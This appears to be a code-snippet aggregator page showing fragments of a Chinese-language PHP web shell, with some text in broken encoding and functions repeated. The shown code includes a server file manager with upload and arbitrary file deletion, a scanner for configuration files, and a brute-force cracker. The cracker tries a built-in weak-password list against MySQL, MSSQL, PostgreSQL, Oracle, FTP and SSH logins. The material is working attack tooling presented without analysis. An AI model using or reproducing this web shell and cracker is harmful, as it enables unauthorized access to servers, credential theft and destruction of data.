html_n("</div>");
     break;
 case "main":
     css_js("1");
     $dir = @dir($path);
     $REAL_DIR = File_Str(realpath($path));
     if (!empty($_POST['actall'])) {
         echo '<div class="actall">' . File_Act($_POST['files'], $_POST['actall'], $_POST['inver'], $REAL_DIR) . '</div>';
     }
     $NUM_D = $NUM_F = 0;
     if (!$_SERVER['SERVER_NAME']) {
         $GETURL = '';
     } else {
         $GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/';
     }
     $ROOT_DIR = File_Mode();
     html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>地址:<input type='hidden' name='eanver' value='main'>");
     html_n("<input type='text' size='80' name='path' value='{$path}'> <input type='submit' value='转到'></form>");
     html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=" . urlencode($path) . "'>");
     html_n("<input type=\"button\" value=\"新建文件\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=" . urlencode($path) . "&refile=1&name=');\"> <input type=\"button\" value=\"新建目录\" onclick=\"rusurechk('newdir','?eanver=editr&p=" . urlencode($path) . "&redir=1&name=');\">");
     html_input("file", "upfilet", "", "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ");
     html_input("submit", "uploadt", "上传");
     if (!empty($_POST['newfile'])) {
         if (isset($_POST['bin'])) {
             $bin = $_POST['bin'];
         } else {
             $bin = "wb";
         }
         if (substr(PHP_VERSION, 0, 1) >= 5) {
             if ($_POST['charset'] == 'GB2312' or $_POST['charset'] == 'GBK') {
             } else {
Exemple #2
0
function Findfile_j()
{
    if (!empty($_GET['df'])) {
        echo $_GET['df'];
        if (@unlink($_GET['df'])) {
            echo 'ɾ���ɹ�';
        } else {
            @chmod($_GET['df'], 0666);
            echo @unlink($_GET['df']) ? 'ɾ���ɹ�' : 'ɾ��ʧ��';
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }
    $SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();
    $SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';
    $SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip|.pdf|.dll|.exe|.txt|.inf|.ppt|.xls|.js';
    print <<<END
<form method="POST" name="jform" id="jform" action="?s=j">
<div class="actall">ɨ��·�� <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">�����ļ� <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div>
<div class="actall">�ؼ��ִ� <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;">
<input type="radio" name="sff" value="a" checked>�����ļ���
<input type="radio" name="sff" value="b">������������</div>
<div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>������Ӧ���ڸ��ļ���,���ļ��к��ļ�
<br><input type="radio" name="sfb" value="b">��������Ӧ���ڸ��ļ���</div>
<div class="actall"><input type="submit" value="��ʼɨ��" style="width:80px;"></div>
</form>
END;
    if (!empty($_POST['sfp']) && !empty($_POST['sfc'])) {
        echo '<div class="actall">';
        $_POST['sft'] = str_replace('.', '\\.', $_POST['sft']);
        $sff = $_POST['sff'] == 'a' ? true : false;
        $sfb = $_POST['sfb'] == 'a' ? true : false;
        echo Findfile_Auto($_POST['sfp'], $_POST['sfc'], $_POST['sft'], $sff, $sfb) ? '��������' : '�쳣��ֹ';
        echo '</div>';
    }
    return true;
}
Exemple #3
0
function Crack_k()
{
    $MSG_BOX = '等待消息队列......';
    $ROOT_DIR = File_Mode();
    $SORTS = explode('/', $ROOT_DIR);
    array_shift($SORTS);
    $PASS = join(',', $SORTS);
    //用系统文件夹做密码,用for生成一组纯数字重复密码 by:yoco
    for ($i = 0; $i < 10; $i++) {
        $n = (string) $i;
        $PASS .= $n . $n . $n . $n . $n . $n . ',';
        $PASS .= $n . $n . $n . $n . $n . $n . $n . ',';
        $PASS .= $n . $n . $n . $n . $n . $n . $n . $n . ',';
    }
    if (!empty($_POST['address']) && !empty($_POST['user']) && !empty($_POST['pass'])) {
        $SORTPASS = explode(',', $_POST['pass']);
        $connect = false;
        $MSG_BOX = 'not found';
        for ($k = 0; $k < count($SORTPASS); $k++) {
            if ($_POST['class'] == 'mysql') {
                $connect = @mysql_connect($_POST['address'], $_POST['user'], chop($SORTPASS[$k]));
            }
            if ($_POST['class'] == 'mssql') {
                $connect = @mssql_connect($_POST['address'], $_POST['user'], chop($SORTPASS[$k]));
            }
            if ($_POST['class'] == 'pgsql') {
                $connect = @pg_connect("host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop({$SORTPASS[$k]})}");
            }
            if ($_POST['class'] == 'oracle') {
                $connect = @oci_connect($_POST['user'], chop($SORTPASS[$k]), $_POST['address']);
            }
            if ($_POST['class'] == 'ftp') {
                $Ftp_conn = @ftp_connect($_POST['address'], '21');
                $connect = @ftp_login($Ftp_conn, $_POST['user'], chop($SORTPASS[$k]));
            }
            if ($_POST['class'] == 'ssh') {
                $ssh_conn = @ssh2_connect($_POST['address'], '22');
                $connect = @ssh2_auth_password($ssh_conn, $_POST['user'], chop($SORTPASS[$k]));
            }
            if ($connect) {
                $MSG_BOX = '[project: ' . $_POST['class'] . '] [ip: ' . $_POST['address'] . '] [user: '******'user'] . '] [pass: '******']';
            }
        }
    }
    print <<<END
<form method="POST" name="ccform" id="ccform" action="?s=cc">
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<div class="actall">主机<input type="text" name="address" value="localhost" style="width:300px"></div>
<div class="actall">账户<input type="text" name="user" value="root" style="width:300px"></div>
<div class="actall">密码<br><textarea name="pass" rows="20" cols="110">root,123456,123123,123321,admin,admin888,admin@admin,root@root,qwer123,5201314,iloveyou,fuckyou,kissme,520520,5845201314,a123456,a123456789,{$PASS}administrator</textarea></div>
<div class="actall">方式<input type="radio" name="class" value="mysql" checked>Mysql <input type="radio" name="class" value="mssql" checked>mssql <input type="radio" name="class" value="pgsql" checked>Pgsql <input type="radio" name="class" value="oracle" checked>Oracle <input type="radio" name="class" value="ftp">FTP <input type="radio" name="class" value="ssh" checked>SSH</div>
<div class="actall"><input class="bt" type="submit" value="开始"></div></form>
END;
    return true;
}
function Findfile_j()
{
    if (!empty($_GET['df'])) {
        echo $_GET['df'];
        if (@unlink($_GET['df'])) {
            echo '删除成功';
        } else {
            @chmod($_GET['df'], 0666);
            echo @unlink($_GET['df']) ? '删除成功' : '删除失败';
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }
    $SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();
    $SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';
    $SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip';
    print <<<END
<form method="POST" name="jform" id="jform" action="?s=j">
<div class="actall">扫描路径 <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">过滤文件 <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div>
<div class="actall">关键字串 <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;">
<input type="radio" name="sff" value="a" checked>搜索文件名 
<input type="radio" name="sff" value="b">搜索包含文字</div>
<div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>将搜索应用于该文件夹,子文件夹和文件
<br><input type="radio" name="sfb" value="b">仅将搜索应用于该文件夹</div>
<div class="actall"><input type="submit" value="开始扫描" style="width:80px;"></div>
</form>
END;
    if (!empty($_POST['sfp']) && !empty($_POST['sfc'])) {
        echo '<div class="actall">';
        $_POST['sft'] = str_replace('.', '\\.', $_POST['sft']);
        $sff = $_POST['sff'] == 'a' ? true : false;
        $sfb = $_POST['sfb'] == 'a' ? true : false;
        echo Findfile_Auto($_POST['sfp'], $_POST['sfc'], $_POST['sft'], $sff, $sfb) ? '搜索完毕' : '异常终止';
        echo '</div>';
    }
    return true;
}
Exemple #5
0
function Crack_k()
{
    $MSG_BOX = 'waiting for message queue......';
    $ROOT_DIR = File_Mode();
    $SORTS = explode('/', $ROOT_DIR);
    array_shift($SORTS);
    $PASS = join(',', $SORTS);
    for ($i = 0; $i < 10; $i++) {
        $n = (string) $i;
        $PASS .= $n . $n . $n . $n . $n . $n . ',';
        $PASS .= $n . $n . $n . $n . $n . $n . $n . ',';
        $PASS .= $n . $n . $n . $n . $n . $n . $n . $n . ',';
    }
    if (!empty($_POST['address']) && !empty($_POST['user']) && !empty($_POST['pass'])) {
        $SORTPASS = explode(',', $_POST['pass']);
        $connect = false;
        $MSG_BOX = 'not found';
        for ($k = 0; $k < count($SORTPASS); $k++) {
            if ($_POST['class'] == 'mysql') {
                $connect = @mysql_connect($_POST['address'], $_POST['user'], chop($SORTPASS[$k]));
            }
            if ($_POST['class'] == 'ftp') {
                $Ftp_conn = @ftp_connect($_POST['address'], '21');
                $connect = @ftp_login($Ftp_conn, $_POST['user'], chop($SORTPASS[$k]));
            }
            if ($_POST['class'] == 'mssql') {
                $connect = @mssql_connect($_POST['address'], $_POST['user'], chop($SORTPASS[$k]));
            }
            // if($_POST['class'] == 'pgsql') $connect = @pg_connect("host=$_POST['address'] port=5432 dbname=postgres user=$_POST['user'] password="******"host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop({$SORTPASS[$k]})}");
            }
            //$connect = @oci_connect('system','oracle','"//localhost/orcl');
            if ($_POST['class'] == 'oracle') {
                $connect = @oci_connect($_POST['user'], chop($SORTPASS[$k]), $_POST['address']);
            }
            if ($_POST['class'] == 'ssh') {
                $ssh_conn = @ssh2_connect($_POST['address'], '22');
                $connect = @ssh2_auth_password($ssh_conn, $_POST['user'], chop($SORTPASS[$k]));
            }
            if ($connect) {
                $MSG_BOX = '[project: ' . $_POST['class'] . '] [ip: ' . $_POST['address'] . '] [user: '******'user'] . '] [pass: '******']';
            }
        }
    }
    print <<<END
<form method="POST" name="kform" id="kform" action="?s=k">
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<div class="actall">Host <input type="text" name="address" value="localhost" style="width:300px"></div>
<div class="actall">User <input type="text" name="user" value="root" style="width:300px"></div>
<div class="actall">Pass <textarea name="pass" rows="20" cols="165">{$PASS}root,123456,123123,123321,admin,admin888,admin@admin,root@root,qwer123,5201314,iloveyou,fuckyou,kissme,520520,5845201314,a123456,a123456789</textarea></div>
<div class="actall">Crack Project: <input type="radio" name="class" value="mysql" checked>Mysql 
<input type="radio" name="class" value="ftp">FTP<input type="radio" name="class" value="mssql" checked>mssql<input type="radio" name="class" value="pgsql" checked>Pgsql<input type="radio" name="class" value="oracle" checked>Oracle<input type="radio" name="class" value="ssh" checked>SSH</div>
<div class="actall"><input class="bt" type="submit" value="Begin"></div></form>
END;
    return true;
}